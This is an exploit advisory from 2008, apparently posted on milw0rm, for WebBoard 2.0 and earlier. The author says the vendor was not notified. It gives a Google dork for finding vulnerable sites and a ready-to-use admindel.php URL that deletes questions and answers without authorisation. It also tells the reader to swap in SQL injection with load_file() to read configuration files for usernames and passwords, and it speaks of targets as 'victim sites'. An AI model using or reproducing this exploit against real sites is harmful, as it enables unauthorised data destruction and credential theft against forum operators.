60 lines
No EOL
1.6 KiB
Text
60 lines
No EOL
1.6 KiB
Text
-[*]+================================================================================+[*]-
|
|
-[*]+ WebBoard <= 2.0 Arbitrary SQL Question/Anwser Delete Vulnerability +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
|
|
|
|
[*] Discovered By: t0pP8uZz
|
|
[*] Discovered On: 20 AUGUST 2008
|
|
[*] Script Download: N/A
|
|
[*] DORK (google): "and Powered By :Sansak"
|
|
|
|
|
|
|
|
[*] Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
[*] DESCRIPTION/USAGE:
|
|
|
|
WebBoard suffers from remote vulnerabilitys, included in this writeup is a method to
|
|
arbitrary delete the questions and anwsers from the board. its also possible to execute sql querys
|
|
|
|
once you have found a vulnerable website (shouldnt be hard from 2k+ vuln sites) modify the url
|
|
below to include the victim sites domain, and change the <NUM> tags to a valid question/anwser number
|
|
execute the url, and the question and anwsers will be deleted.
|
|
|
|
you can also use SQL injection in replace of the <NUM> tags use load_file() to view the config file
|
|
for username and passwords.
|
|
|
|
|
|
|
|
[*] Vulnerability:
|
|
|
|
http://site.com/webboard/admindel.php?action=delete&mode=question&qno=<NUM>&ano=<NUM>
|
|
|
|
|
|
|
|
[*] NOTE/TIP:
|
|
|
|
null
|
|
|
|
|
|
|
|
[*] GREETZ:
|
|
|
|
milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
|
|
|
|
|
|
|
|
[-] Peace...
|
|
|
|
...t0pP8uZz !
|
|
|
|
|
|
|
|
-[*]+================================================================================+[*]-
|
|
-[*]+ WebBoard <= 2.0 Arbitrary SQL Question/Anwser Delete Vulnerability +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
# milw0rm.com [2008-08-25] |